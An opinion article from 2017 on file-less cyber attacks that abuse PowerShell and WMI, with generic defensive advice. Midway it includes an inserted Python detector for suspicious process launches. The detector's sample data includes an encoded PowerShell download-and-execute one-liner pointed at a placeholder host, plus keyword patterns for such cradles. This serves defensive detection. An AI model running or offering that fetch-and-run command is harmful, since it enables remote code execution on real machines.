
This article was published on October 28, 2017

What are file-less cyber attacks and how do you protect against them

Story by Peter Buttler

Peter Buttler is an Info Security Journalist and Tech Reporter who contributes to a number of online publications, including Infosecurity-magazine, SC Magazine UK, Tripwire, Globalsign and CSO Australia, among others. He covers topics related to online security, big data, IoT and artificial intelligence. With more than seven years of IT experience, he also holds a Master’s degree in cybersecurity and technology.

Businesses and internet users are finally becoming more aware of the danger of cyber attacks. They’ve started to strengthen their defensive techniques, leaving hackers with fewer options to carry out their malicious deeds.

However, exploiting a vulnerability is only a matter of technique and available resources, so detection is what decides how long an attacker can stay inside a network. This is extremely important because there is a new hacking technique on the rise, called the “file-less cyber attack”.

This technique can bypass antivirus software and corporate firewalls without being detected. This new breed of attack can be especially damaging because it gains access to corporate networks without relying on a conventional malware file.

A malicious hacker could therefore gain access to your system with relative ease by exploiting weak software and injecting code into it. Once inside, he or she can run code that destroys, steals or corrupts important data without leaving a trace on disk. The hacker could, for example, turn operating system tools such as Windows Management Instrumentation or PowerShell to his or her own ends.
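The abuse of built-in tools described above is exactly what a defender has to look for once there is no malicious file to scan. As an added illustration (this code is not from the article), the small Python detector below runs over a handful of constructed process-creation records, modelled loosely on the fields Sysmon or PowerShell logging would produce, and flags the indicators practitioners commonly associate with file-less activity: PowerShell launched by the WMI provider host or an Office application, hidden windows, and `-EncodedCommand` payloads that decode to download-and-run keywords. The parent-process list, regular expressions and sample records are all assumptions chosen for the example, not an authoritative rule set.

```python
"""Toy detector for file-less ("living off the land") indicators.

Added example: the event format and sample records below are constructed to
resemble Windows process-creation logs (e.g. Sysmon Event ID 1); they are not
real data, and the indicator lists are illustrative assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcessEvent:
    """One process-creation record: who launched what, with which arguments."""
    parent_image: str
    image: str
    command_line: str

# Parents that rarely launch an interactive shell in normal use (assumption).
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "winword.exe", "excel.exe", "mshta.exe"}
# Script fragments typical of download-and-run one-liners (assumption).
CRADLE_RE = re.compile(r"\b(IEX|Invoke-Expression|DownloadString|FromBase64String)\b", re.I)
# PowerShell accepts abbreviated switch names, so match the common prefixes.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)

def encode_ps(script: str) -> str:
    """PowerShell expects -EncodedCommand as base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent/invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed base64 or odd byte count: not a PowerShell payload

def analyse(ev: ProcessEvent) -> List[str]:
    """Return the list of reasons an event looks suspicious (empty if benign)."""
    reasons: List[str] = []
    image = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if image == "powershell.exe" and parent in SUSPICIOUS_PARENTS:
        reasons.append(f"powershell spawned by {parent}")
    if HIDDEN_RE.search(ev.command_line):
        reasons.append("hidden window")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        reasons.append("encoded command")
    # Inspect the decoded script when there is one, otherwise the raw arguments.
    script = decoded if decoded is not None else ev.command_line
    if CRADLE_RE.search(script):
        reasons.append("download cradle keyword")
    return reasons

def scan(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, List[str]]]:
    """Keep only the events that produced at least one reason."""
    return [(ev, reasons) for ev in events if (reasons := analyse(ev))]

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample records: one benign, two that show the indicators above.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS_PATH,
                 "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS_PATH,
                 "powershell.exe -NoP -W Hidden -EncodedCommand "
                 + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")),
    ProcessEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", PS_PATH,
                 "powershell.exe -WindowStyle Hidden -Command Start-Sleep 1"),
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(f"{ev.parent_image} -> {ev.image}: {', '.join(reasons)}")
```

The point of the example is the shape of the check rather than the specific strings: the decision is made on parent/child relationships and command-line content, which a file-based antivirus scan never sees, and the encoded payload is decoded before the keyword match so that obfuscation does not hide it.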

A silent risk

Technical advancements keep making our data and systems safer, but unfortunately malware seems to develop at the same rate. This pushes hackers to alter their tactics so that each attack is more potent and responsive than the previous one.

File-less cyber attacks have been increasing in the past few months, which is extremely worrisome: by leaving no footprint, they can be even more destructive than ransomware.

That’s why the Prudential Regulation Authority has called them a “Silent risk”. The attackers behind such attacks have various intentions, including access to intellectual property, personally identifiable information (PII), or any information relevant to strategic intelligence. Basically, all the incredibly important stuff.

Those who know the existing antivirus vendors and their techniques probably aren’t surprised that hackers have come up with a file-less approach. It’s convenient and allows hackers to attack without using conventional executable files: they can get similar results by embedding their malicious code in an apparently benign file such as a PDF or Word document.

Companies and organizations that operate on legacy operating systems are almost begging to be attacked, seeing that legacy systems often have irregularly managed antivirus software, or software that is about to reach the end of its life. It goes without saying that once the vendor stops releasing patches for an operating system, your business becomes easy prey for a cyber attack.

However, these inefficient security controls create a false sense of security, giving threat actors a wider margin to find ever more inventive ways of circumventing the detection techniques arrayed against them.

Even against obvious threats such as ransomware, most firms and businesses rely on incompetent techniques. A file-less cyber attack, which can remain undetected for a long period, could therefore be far more lethal.

Protecting against the ultimate threat

If organizations want to withstand new attacks, they must have a proper, pre-planned policy for managing malware incidents and the rise of file-less attacks. We can’t rely on old methods; we need to switch to in-depth, strict initiatives to defend against untraceable silent threats.

So here’s what we need to do:

  • Invest in primary security protections such as high-quality end-to-end encryption, two-factor authentication and installation of the latest efficient anti-virus software, kept regularly updated. This helps close the security gaps prevailing in the business organization. Duh.

Faulty anti-virus programs are mostly ineffective at stopping an attack. For instance, only 10 out of 61 antivirus products were able to stop the NotPetya attack, which is terrible.

  • We also need to emphasize ‘laws and regulations’: controlled and restricted administrative access is a vital part of the security of a business. Be strict when managing permissions, limiting them to just what each level of individual requires.
  • Be aware that a lack of knowledge of existing and upcoming security threats can be detrimental to an organization. Cases such as file-less attacks should be reported immediately by every organization; otherwise we may have to wait for another destructive attack such as WannaCry to compel businesses to invest in the latest security, next-generation firewalls and system upgrades.

However, all organizations and firms should acknowledge that nothing can fully eradicate ever-improving cyber threats. Instead, they should identify a potential threat from little evidence and implement an intelligent solution according to the nature of the attack. They must also keep their systems updated, with continuous data backups and security checks.
